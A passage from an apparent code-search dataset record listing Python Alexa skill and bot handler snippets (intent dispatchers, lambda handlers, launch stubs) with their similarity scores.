minutes'.format(hour, minute)\n elif hour == 1:\n speech_time = 'one hour and {} minutes'.format(minute)\n else:\n speech_time = '{} minutes'.format(minute)\n\n speech_text += 'It\\'s been ' + speech_time + ' since your last login. '\n\n card_text = 'Offline time: ' + str(datetime.timedelta(seconds=passing_time)) + '\\nExp obtained:{} \\n'.format(loot_exp)\n\n if cur_char.messages:\n speech_text += 'You have unread messages. '\n card_text += 'You have unread messages. \\n'\n\n attr['character'] = cur_char.to_dict()\n\n if 'in_maze' in attr and (attr['in_maze'] == 'IN' or attr['in_maze'] == 'WAIT'):\n speech_text += 'You didnt finish your maze. Say resume the maze to go back to where you were. '\n card_text += 'You did not finish your maze. 
'\n attr['in_maze'] = 'WAIT'\n\n card = ui.SimpleCard(\n title='Welcome to Daily Dungeon',\n content=card_text\n )\n\n handler_input.attributes_manager.save_persistent_attributes()\n\n handler_input.response_builder.speak(\n speech_text).ask('what would you like to do').set_card(card)\n\n return handler_input.response_builder.response", "def on_intent(event, intent_request, session):\n\n logger.info(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent == \"NextBins\":\n return get_next_collection(event, session)\n\n return get_generic_welcome_message()", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n\r\n # Dispatch to your skill's intent handlers\r\n if intent_name == \"MakeCoffee\":\r\n return make_coffee(intent, session)\r\n elif intent_name == \"TurnCoffeeMachine\":\r\n return turn_coffee_machine(intent, session)\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return turn_off_coffee_machine()\r\n else:\r\n return invalid_intent()\r\n #raise ValueError(\"Invalid intent\")\r", "async def skill(self, ctx, *, skill: str):\n\n try:\n skill = self.get_entry('Skill', skill.lower())\n except RuntimeError as e:\n return await ctx.send(e)\n\n name = skill['Name']\n\n embed = discord.Embed(title=name)\n embed.set_thumbnail(url='attachment://skill.png')\n embed.add_field(name='Learned', value=skill['Class/Rank'], inline=False)\n embed.add_field(name='Effect', value=skill['Effect'])\n\n await ctx.send(file=discord.File(f'xenox/skills/{name}.png', 'skill.png'), embed=embed)", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n league = brasileirao.get()\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'], league)\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def _skills_manager_dispatch():\n global ws\n ws.emit(Message(\"skill_manager\", {}))", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"HelloWorldIntent\":\n return handle_session_end_request()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", 
"def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"AddToCart\":\n return quary(intent, session)\n else:\n print(\"invalid intent\")\n raise ValueError(\"Invalid intent\")", "def launch(self, launch):\n\n self._launch = launch", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n else:\n print (\"********************** Unknown Request\")", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"RandNumIntent\":\n return generate_random_num(intent, session)\n elif intent_name == \"RangeRandNumIntent\":\n return generate_random_num(intent, session)\n elif intent_name == \"DiceIntent\":\n return generate_random_num(intent, session, num1=1, num2=6)\n elif intent_name == \"HundredDiceIntent\":\n return generate_random_num(intent, session, num1=1, num2=100)\n elif intent_name == \"RouletteIntent\":\n return generate_random_num(intent, session, num1=1, num2=10)\n elif intent_name == \"SelectIntent\":\n return generate_random_num(intent, session, num1=1)\n elif intent_name == \"RepeatIntent\":\n if 'attributes' not in session:\n return handle_error_status()\n else:\n attributes = session.get('attributes')\n return generate_random_num(intent, session, **attributes)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_help_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")", "def on_launch():\n return get_welcome_message()", "def lambda_handler(event, context):\n print('HANDLING EVENT')\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] 
== \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])", "def lambda_handler(event, context):\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n\n # try to get a valid token for this user, from the cache,\n # if not in the cache, the create a new (this will send\n # the user to a web page where they can authorize this app)\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n\n if (event['session']['application']['applicationId'] not in alexa_trusted_appids):\n raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n token_info = sp_oauth.get_cached_token()\n if not token_info:\n print('''\n Invalid or no token\n ''')\n raise spotipy.SpotifyException(401, -1, 'Invalid or no token')\n\n token = token_info['access_token']\n sp = spotipy.Spotify(auth=token)\n sp.trace = False\n results = sp.start_playback(device_id=SPOTIPY_DEVICE_ID,\n context_uri=SPOTIPY_CONTEXT_URI)\n print(results)\n # print(\"[<<DEVELOPER>>] launch request:\")\n # pp = pprint.PrettyPrinter(indent=4)\n # pp.pprint(event)\n\n #### trigger IFTTT mood lighting\n r = http.request('GET', IFTTT_URI)\n print(\"IFTTT request status: \" + str(r.status))\n\n return handle_session_end_request()\n # silently error\n\n # if event['request']['type'] == \"LaunchRequest\":\n # return on_launch(event['request'], event['session'])\n # elif event['request']['type'] == \"IntentRequest\":\n # return on_intent(event['request'], event['session'])\n # elif event['request']['type'] == \"SessionEndedRequest\":\n # return on_session_ended(event['request'], event['session'])", "def lambda_handler(event, context):\r\n if 'session' in event:\r\n print(\"event.session.application.applicationId=\" +\r\n event['session']['application']['applicationId'])\r\n\r\n \"\"\"\r\n Uncomment this if statement and populate with your skill's application ID to\r\n prevent someone else from configuring a skill that sends requests to this\r\n function.\r\n \"\"\"\r\n if ('session' in event and (event['session']['application']['applicationId'] !=\r\n \"amzn1.ask.skill.57119d91-fb3c-487f-be53-4e7fac12fb83\")):\r\n raise ValueError(\"Invalid Application ID\")\r\n\r\n \"\"\"if event['session']['new']:\r\n on_session_started({'requestId': event['request']['requestId']},\r\n event['session'])\"\"\"\r\n\r\n if event['request']['type'] == \"LaunchRequest\":\r\n return on_launch(event['request'], event['session'])\r\n elif event['request']['type'] == \"IntentRequest\":\r\n return on_intent(event['request'], event['session'])\r\n elif event['request']['type'] == \"SessionEndedRequest\":\r\n return on_session_ended(event['request'], event['session'])\r\n elif event['request']['type'] == 'UPDATE':\r\n return saveCoffeeMachineStatus(event['request'])\r\n elif event['request']['type'] == \"GLASS\":\r\n return glassStatus(event['request'])\r\n elif event['request']['type'] == \"WATER\":\r\n return waterStatus(event['request'])\r\n elif event['request']['type'] == \"COFFEE\":\r\n return coffeeStatus(event['request'])\r\n elif 
event['request']['type'] == \"ON_OFF\":\r\n return on_off_status(event['request'])\r\n elif event['request']['type'] == \"ONLINE\":\r\n return online_status_f(event['request'])\r\n elif event['request']['type'] == 'BUSY':\r\n return busyStatus(event['request'])", "def lambda_handler(event, context):\r\n print(\"Incoming request...\")\r\n\r\n \"\"\"\r\n Uncomment this if statement and populate with your skill's application ID to\r\n prevent someone else from configuring a skill that sends requests to this\r\n function.\r\n \"\"\"\r\n # if (event['session']['application']['applicationId'] !=\r\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\r\n # raise ValueError(\"Invalid Application ID\")\r\n\r\n if event['session']['new']:\r\n on_session_started({'requestId': event['request']['requestId']},\r\n event['session'])\r\n\r\n if event['request']['type'] == \"LaunchRequest\":\r\n return on_launch(event['request'], event['session'])\r\n elif event['request']['type'] == \"IntentRequest\":\r\n return on_intent(event['request'], event['session'])\r\n elif event['request']['type'] == \"SessionEndedRequest\":\r\n return on_session_ended(event['request'], event['session'])", "def on_start(self):", "def on_start(self):", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] + \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"StartIntent\": \n '''if \"attributes\" in session.keys():\n return answer_question(intent,session)\n '''\n return start_feedback(intent, session)\n \n elif intent_name == \"AnswerIntent\":\n return answer_question(intent, session)\n \n elif intent_name == \"AMAZON.ResumeIntent\":\n return resume_feedback(intent, session)\n \n elif intent_name == \"AMAZON.PauseIntent\":\n return pause_feedback(intent, session)\n \n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n \n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request(session)\n \n else:\n raise ValueError(\"Invalid intent\")", "async def handle(self):\n local_controller = self.controller\n local_controller.add_action(local_controller.larvae.random.train(HYDRALISK))\n return True", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "def on_start(self):\n pass", "async def post_launch(self, **kwargs: Any) -> None:\n pass" ]
[ "0.7680054", "0.7644753", "0.7633401", "0.7608987", "0.7601289", "0.7596736", "0.75540215", "0.75540215", "0.755073", "0.7501771", "0.7501771", "0.7501771", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7485739", "0.7473019", "0.74665284", "0.74624527", "0.73820716", "0.73386073", "0.66323274", "0.6275754", "0.6216917", "0.61969507", "0.6178782", "0.6092518", "0.6045752", "0.59480846", "0.5928729", "0.5883608", "0.5847982", "0.5824695", "0.5823489", "0.57614344", "0.57345694", "0.5710309", "0.56852835", "0.5676373", "0.5657934", "0.56518", "0.5649453", "0.56488425", "0.5646135", "0.56013805", "0.5594919", "0.5579775", "0.5576167", "0.5566848", "0.55565923", "0.5550249", "0.5541274", "0.5519869", "0.5493353", "0.5479133", "0.54765475", "0.54710454", "0.54484665", "0.54479194", "0.5443183", "0.5441047", "0.5440796", "0.5431785", "0.54222107", "0.54126936", "0.541093", "0.53915817", "0.5391561", "0.53881615", "0.5387033", "0.5385074", "0.53787297", "0.5375658", "0.5368319", "0.53682035", "0.5366981", "0.53619915", "0.53619915", "0.5357362", "0.5343537", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.5340485", "0.53398794" ]
0.56940675
48
Handler for Help Intent.
def help_intent_handler(handler_input):
    # type: (HandlerInput) -> Response
    handler_input.response_builder.speak(help_text).ask(help_text)
    return handler_input.response_builder.response
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Help(self, event):\n Help(self)", "def on_bot_help(update, _context):\n update.message.reply_text(c.MSG_HELP)", "def help_handler(bot, update):\n logger.info(f\"Help command received. Chat ID: {update.message.chat_id}\")\n update.message.reply_text(config.HELP_MESSAGE)", "def onHelp(self, event):\n if self.helpwindow is None:\n self.helpwindow = sc.getHelpWindow()\n self.helpwindow.DisplayContents()", "def cb_help( self, ):\r\n # this shows how to run stuff in the helper -- call thru queue, post to queue\r\n #help_file = self.parameters.help_file\r\n AppGlobal.os_open_help_file( self.parameters.help_file )", "def _help(self):\n self.onecmd('help')", "def help_command(update, context):\n update.message.reply_text('Help!')", "def help_intent_handler(handler_input):\n # type: (HandlerInput) -> Response\n # TODO: set a speech here\n speech_text = (\n \"Here should be a help speech.\")\n reprompt = \"Here should be a help reprompt.\"\n\n handler_input.response_builder.speak(speech_text).ask(reprompt)\n return handler_input.response_builder.response", "async def do_help():\n\n if len(message.content.split()) > 1:\n for i in cmd_dict:\n if message.content.split()[1] == i:\n await bot.send_message(c, f'Help for {i}: {cmd_dict[i].__doc__}')\n return\n\n cmdstr = 'Commands: '\n for i in cmd_dict:\n cmdstr += '{}, '.format(i)\n await bot.send_message(c, cmdstr)", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def do_help(self, args):\n ## The only reason to define this method is for the help text in the doc string\n cmd.Cmd.do_help(self, args)", "def help_command(update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text('Help!')", "def help():\n print(UI.HELP)", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help(update, context):\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text('Help!')", "def help():\n \n pass", "def help(self):", "def help(self):", "async def help(self, ctx):\n self.log_command_call(\"help\", ctx.message)\n await ctx.send(HELP_TEXT)\n embed_output = create_embed(description=MORE_INFO_TEXT)\n await ctx.send(embed=embed_output)", "def help(self):\n pass", "def help(self):\n pass", "def run_help(s, remainder):\n return SlackResponseText(\"help functionality is not currently implemented\")", "def help():\n print \"Help comes to those who ask\"", "def help_handler(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Use /quiz, /poll or /preview to test this bot.\")", "def help_intent_handler(handler_input):\n return help_request(handler_input, MINUS_POINTS, QUIT_MINUS_POINTS)", "def show_help(self):\n self.slack.reply('\\n\\n'.join(self.help_lines))", "def _help(update, 
context):\n message = '''This bot will fetch data from some public APIs, insert fetched data into \\\nGoogle spreadsheets and send url of the spreadsheet to the user. \\n\n/fetch - fetch data and return url of spreadsheet.\n/help - return help message'''\n update.message.reply_text(message)", "def switch_help(self, key, rows):\n self.controller.set_context('help')", "def help(self, update, context):\n\n message = \"Do you need help \\n Help menu shows here🤞\"\n update.message.reply_text(message)", "def help_command(update, context):\n update.message.reply_text('Let me help you. \\r\\n /help print this help \\r\\n /safety prints safety instructions \\r\\n /play start the game\\r\\n /joingroup Join CTF tg group')", "def displayhelp(self):\n helper = HelpView(self)\n helper.activateWindow()\n helper.exec()\n self.activateWindow()", "def help():", "def help_command_handler(update, context):\n update.message.reply_text('Type /start')", "def cmd_help(update, context):\n\n TEXT = f'''Hei, kamu butuh bantuan ya? {emo_hushed}, aku masih dikembangkan jadi maaf yaa kalo aku masih bingung. <br />Ini adalah perintah yang aku mengerti, silakan panggil aku dengan memberikan perintah dibawah ini yaaa {emo_wink}<br />\n /start - {emo_start} mulai dari sini yaaa kalo belum\n /help - {emo_question} butuh bantuan aku?\n /laporan - {emo_book} kamu mau melihat laporan?\n '''\n context.bot.send_message(\n chat_id=update.effective_chat.id,\n text=TEXT)", "def on_pushButtonHelp_clicked(self, checked):\n\n help = Help.MainApp()\n help.setWindowTitle('Help for ' + TITLE)\n help.show()\n\n help.textEdit.setText(helpText)", "def help_handler(self, update: Update, context: CallbackContext) -> None:\r\n update.message.reply_text(\"Use /quiz, /start or /preview to test this \" \"bot.\")", "def help(self):\n\t\treturn", "def bot_help(bot, update, args):\n if not args:\n update.message.reply_text(helpmessages.mainHelp())\n elif args[0] == \"alert\":\n bot.sendMessage(update.message.chat_id, helpmessages.alertHelp())\n elif args[0] == \"fortune\":\n bot.sendMessage(update.message.chat_id, fortune.fortuneHelp())\n elif args[0] == \"quote\":\n bot.sendMessage(update.message.chat_id, helpmessages.quoteHelp())\n elif args[0] == \"bash\":\n bot.sendMessage(update.message.chat_id, helpmessages.bashHelp())\n else:\n update.message.reply_text(helpmessages.mainHelp())", "def test_handle_help(self):\n ret, code = self.testcommand.handle(\"team help\", user)\n self.assertEqual(ret, self.testcommand.get_help())\n self.assertEqual(code, 200)", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(messages.HELP_TEXT)", "def launchHelpWindow(self):\r\n self.popup(\"Help\",HELP,geom=\"350x200\")", "def help(update, context):\n update.message.reply_text(\n 'Do you want to request help or offer help? 
'\n 'Type /mainmenu command for more details.'\n )", "def help(self, msg, status, desc):\n\n msg.Chat.SendMessage(HELP_TEXT)", "def do_help(self, line):\n Cmd.do_help(self, line)", "def OnButtonAboutHelpButton(self, event):\r\n\t\twebbrowser.open(consts.URL_HELP_ABOUT)", "def onShowHelp(self, event):\r\n\t\tHelpDialog = fixfixer_help.FixFixerHelpFrame(self)\r\n\t\tHelpDialog.show()", "def askForHelp(self):\n try:\n serverResult = self.game.server.askForHelp(self.game.authKey)\n if type(serverResult) == types.ListType:\n self.help = serverResult\n self.displayHelpMessage()\n else:\n self.modeMsgBox(serverResult)\n except:\n self.modeMsgBox('askForHelp->Connection to Server Lost')", "async def send_command_help(self, ctx: Context) -> None:\n if ctx.command:\n self.bot.help_command.context = ctx\n await ctx.send_help(ctx.command)\n return\n\n await ctx.send_help()", "def get_help(request):\n return utility.respond(request, 'admin/help')", "def help(self):\n return None", "def help_command(update: Update) -> None:\n #update.message.reply_text('Help!')", "def help(self) -> str:\n\t\treturn None", "def help(self, update, context):\n\n message = update.message.text.lower().split(\" \")\n user = self.User(update)\n if len(message) > 1 and message[1] == \"me\":\n output = 'if you need help buddy, call 1201 they are good guys and they will help you'\n else:\n \"\"\"Send help when the command /help is issued.\"\"\"\n output = '/request {line} {station} \\n' \\\n '/history show/clear\\n' \\\n '/show\\n' \\\n '/cancel {line} {station}\\n' \\\n '/help'\n\n if self.data_base.check_admin(user):\n output += '\\n\\n--admin commands --\\n' \\\n '/kick\\n' \\\n '/promote {me/id}\\n' \\\n '/demote {me/id}\\n' \\\n '/stop'\n update.message.reply_text(output)\n self.data_base.log(user, update.message.text, \"*helped*\")", "def helpHelp(self):\r\n QtGui.QMessageBox.about(self, \"Help me!\",\"\"\"\r\n <p> Program sucks and you need help?\r\n <p>Email: \r\n <p><b>andrew.kolb@marquette.edu</b>\r\n <p>Or visit him in Room 230U!\r\n \"\"\")", "def help_args():\n pass", "def command_help(self, bot, update):\n\n messages = [\n 'Available commands:',\n '/who - Who is Myles?',\n '/where - Where is Myles?',\n '/tweet - What was the last tweet Myles sent?',\n '/photo - What was the last Instagram photo Myles took?',\n '/web - Where can I find Myles on the interwebs?',\n ]\n\n self.send_messages(bot, update, messages)", "def _handle_help_argument(self, arguments):\n for help_option in ['help', '--help', '-h']:\n if help_option in arguments:\n LOGGER.info(USAGE_INFORMATION)\n return exit(0)", "def help(update, context):\n\t\n\tupdate.message.reply_text('/start to start the bot')", "def handleHelp(message, commandList):\n listOfCommands = \", \".join(commandList)\n return reply(\"Text an address to this number in order to find the nearest access to a safe restrooom\")", "def OnHelp(self, event):\r\n d = wx.MessageDialog(self, \"... ... ... ... ... ... ... ... 
...\", \"No help for you!\", wx.OK)\r\n d.ShowModal()\r\n d.Destroy()", "def display_help(self):\n pass", "async def help(self, ctx, *, command_name: str=None):\n bot_prefix = '@Randy '\n # Shortcut to command search\n if command_name is not None:\n return await ctx.invoke(self.cmd('help command'), cmd_name=command_name)\n\n em = discord.Embed(title='Help',\n description='**Permissions:** The permissions required to function :-\\n'\n '`Send Messages`, `Manage Messages`, `Embed Links`\\n'\n '--\\nTo get help or more information on a specific command, use:\\n'\n '`{bot_prefix}help <command name>`\\n'\n '--\\nRead my messy code [here](http://github.com/xKynn/RandomRumble)'\n '--\\nIf you like my work and would like to help me, '\n 'Ko-Fi/Paypal: [Link](https://ko-fi.com/D1D6EXXV)\\n',\n color=self.color)\n\n em.set_footer(text=\"Contact me at Demo#7645\")\n\n # This can't go in the init because help isn't loaded last & thus misses some commands\n em.add_field(name=\"Commands\", value=' • '+'\\n • '.join(f\"***{c.name}*** - {c.short_doc}\" for c in self.bot.commands if\n c.name not in ['pob', 'link', 'convert']))\n try:\n await ctx.send(embed=em)\n except:\n await ctx.send(\"`Embed Links` permission is required to see the help!\")", "def onHelpButtonClicked(self, widget):\n self.getGtkTopObject().close()", "def help(self):\r\n self._short_help(None, None, None, None)", "def get_help(intent, session):\n \n print(\"get_help: \", intent)\n\n text = HELP_MESSAGE\n if \"attributes\" in session and \"current_question\" in session[\"attributes\"]:\n attributes = session[\"attributes\"]\n frage_text = attributes[\"current_question\"]\n text += \"Ich wiederhole die letzte Frage: \" + frage_text\n else:\n frage_text = SPIELER_PROMPT_TEXT\n text += SPIELER_PROMPT_TEXT\n attributes = reset_attributes()\n \n attributes[\"current_question\"] = frage_text\n attributes[\"speech_output\"] = text\n attributes[\"reprompt_text\"] = frage_text\n\n return response(text, False, frage_text, attributes, card_text=clear_tags(HELP_MESSAGE)+\\\n \"\\n\" + build_card_content(attributes))", "async def phrase(self, ctx):\n await self.heleus.send_command_help(ctx)", "def show_help():\n pass", "def initialize_help_commands(self) -> None:\n\n @self.command(name=\"help\")\n @logger(\"all\")\n async def help_command(ctx, *args):\n if len(args) == 0:\n await ctx.message.channel.send(indie_help.summary())\n else:\n await ctx.message.channel.send(indie_help.specific(args))", "def do_help(self, arg):\n if arg:\n # Getting help for a specific command\n funcname = self._func_named(arg)\n if funcname:\n # No special behavior needed, delegate to cmd base class do_help()\n cmd.Cmd.do_help(self, funcname[3:])\n else:\n # Show a menu of what commands help can be gotten for\n self._help_menu()", "def help(update, context):\n update.message.reply_text(\"\"\"usage \n /bus <bus name> or /bus <bus name> <stop name>\n /addstop <stop name> <stop code>\n /delstop <stop name>\n /showstops\n /help\n \"\"\")\n\n # log info\n logger.info(\"help used username:{0}\".format(update.message.from_user.username))", "def help():\n last_question = session_attributes[LAST_QUESTION_KEY]\n last_extension = session_attributes[LAST_EXTENSION_KEY]\n\n if last_question == NO_QUESTION:\n return welcome()\n else:\n return question(last_question, extension=last_extension, intro=HELP_MESSAGES[last_question])", "def command_help(self, command):\n self.commands[command].command_help()", "def help(update, context):\n update.message.reply_text('Help! 
\\n /traccia per tracciare instantaneamente i prezzi \\n /check per far partire il check periodico \\n /stopcheck per far fermare il check periodico')", "def cmd_help(args):", "def on_help(self, event):\n\n #import documentation window here to avoid circular imports\n #if put at top of file with rest of imports.\n from documentation_window import DocumentationWindow\n\n _TreeLocation = \"user/sasgui/guiframe/data_explorer_help.html\"\n _doc_viewer = DocumentationWindow(self, -1, _TreeLocation, \"\",\n \"Data Explorer Help\")", "def help(ctx, topic, **kw):\n # The help command implementation is taken from\n # https://www.burgundywall.com/post/having-click-help-subcommand\n if topic is None:\n click.echo(ctx.parent.get_help())\n else:\n click.echo(main.commands[topic].get_help(ctx))", "def help_command(update: Update, context: CallbackContext) -> None:\n update.message.reply_text(\"Laughybot\\n\\n VERSION\\n 0.1 \\n\\nUSAGE\\n /{command} : Entrer une commande parmi celles disponibles\\n\\nCOMMADES\\n/joke => recherche une blague sur la toile\\n/start => Affiche le message d'accueil\\n/help => Affiche l'aide\")", "def onQuitHelp(self, eventDict = None):\n self.mainWindow.setStatusText(\"Press %s + shift + Q to quit\" % Naming.commandKeyName())", "def help():\n return statement(help_text)", "def test_handle_help(self):\r\n ret, code = self.testcommand.handle(\"project help\", user)\r\n self.assertEqual(ret, self.testcommand.get_help())\r\n self.assertEqual(code, 200)", "def help(ctx):\n click.echo(ctx.parent.get_help())", "def help(update, context):\n update.message.reply_text(\"Ayudame!\")", "def helpMenu(userid, args):\r\n if popuplib.isqueued(\"sourcerpg_help\", userid):\r\n return\r\n popuplib.send('sourcerpg_help', userid)", "def on_help(self):\n d = QtGui.QDialog(parent=self)\n dialog = Ui_Dialog()\n dialog.setupUi(d)\n dialog.webView.setUrl(QUrl(\"http://code.google.com/p/svg-component-creator/wiki/UserDocumentation\"))\n d.show()", "def help_me():\n print(\"i'm trapped\")", "async def help(ctx):\n\tembed = discord.Embed(description='Below Are All The Commands For SecretBot')\n\tembed.set_author(name='SecretBot Help Center')\n\tembed.add_field(name='***`!ping`***', value='Returns the bot latency', inline=False)\n\tembed.add_field(name='***`!clear`***', value='Deletes the given amount of messages(default 10) \\n***i.e. !clear 20***', inline=False)\n\tembed.add_field(name='***`!live`***', value='Shows an image with data from a live League of Legends game \\n***i.e. !live NA Test Summoner Name***', inline=False)\n\tembed.add_field(name='***`!league`***', value='Shows an image with data of a summoner \\nFor multiple summoners, split by commas \\n***i.e. !league NA Test_Summoner_Name***', inline=False)\n\tembed.add_field(name='***`!ac`***', value='Shows data on bugs, fossils, or fish\\n***i.e. !ac fish horse mackerel***', inline=False)\n\tembed.set_footer(text='SecretBot isn’t endorsed by Riot Games and doesn’t reflect the views or opinions of Riot Games or anyone officially involved in producing or managing League of Legends. League of Legends and Riot Games are trademarks or registered trademarks of Riot Games, Inc. 
League of Legends © Riot Games, Inc.')\n\tawait ctx.send(embed=embed)", "def __help_menu(self):\n log.debug(\"Displaying __help_menu\")\n # Create a keyboard with the user help menu\n keyboard = [[telegram.KeyboardButton(self.loc.get(\"menu_guide\"))],\n [telegram.KeyboardButton(self.loc.get(\"menu_contact_shopkeeper\"))],\n [telegram.KeyboardButton(self.loc.get(\"menu_all_cancel\"))]]\n # Send the previously created keyboard to the user (ensuring it can be clicked only 1 time)\n self.bot.send_message(self.chat.id,\n self.loc.get(\"conversation_open_help_menu\"),\n reply_markup=telegram.ReplyKeyboardMarkup(keyboard, one_time_keyboard=True))\n # Wait for a reply from the user\n selection = self.__wait_for_specific_message([\n self.loc.get(\"menu_guide\"),\n self.loc.get(\"menu_contact_shopkeeper\")\n ], cancellable=True)\n # If the user has selected the Guide option...\n if selection == self.loc.get(\"menu_guide\"):\n # Send them the bot guide\n self.bot.send_message(self.chat.id, self.loc.get(\"help_msg\"))\n # If the user has selected the Order Status option...\n elif selection == self.loc.get(\"menu_contact_shopkeeper\"):\n # Find the list of available shopkeepers\n shopkeepers = self.session.query(db.Admin).filter_by(display_on_help=True).join(db.User).all()\n # Create the string\n shopkeepers_string = \"\\n\".join([admin.user.mention() for admin in shopkeepers])\n # Send the message to the user\n self.bot.send_message(self.chat.id, self.loc.get(\"contact_shopkeeper\", shopkeepers=shopkeepers_string))\n # If the user has selected the Cancel option the function will return immediately", "def help_alias(self, mess, args):\n return self.help(mess,args)", "def habHelp(self):\n rf = os.path.join('docs','helpButtons','prefsHabitat.html')\n self.showHelpFile( rf )", "async def help(ctx, command:str=None):\n if command == None:\n embed = assemble_embed(\n title=\"Looking for help?\",\n desc=(\"Hey there, I'm a resident bot of Scioly.org!\\n\\n\" +\n \"On Discord, you can send me commands using `!` before the command name, and I will process it to help you! \" +\n \"For example, `!states`, `!events`, and `!fish` are all valid commands that can be used!\\n\\n\" +\n \"If you want to see some commands that you can use on me, just type `!list`! \" +\n \"If you need more help, please feel free to reach out to a staff member!\")\n )\n return await ctx.send(embed=embed)\n hlp = await get_help(ctx, command)\n await ctx.send(embed=hlp)" ]
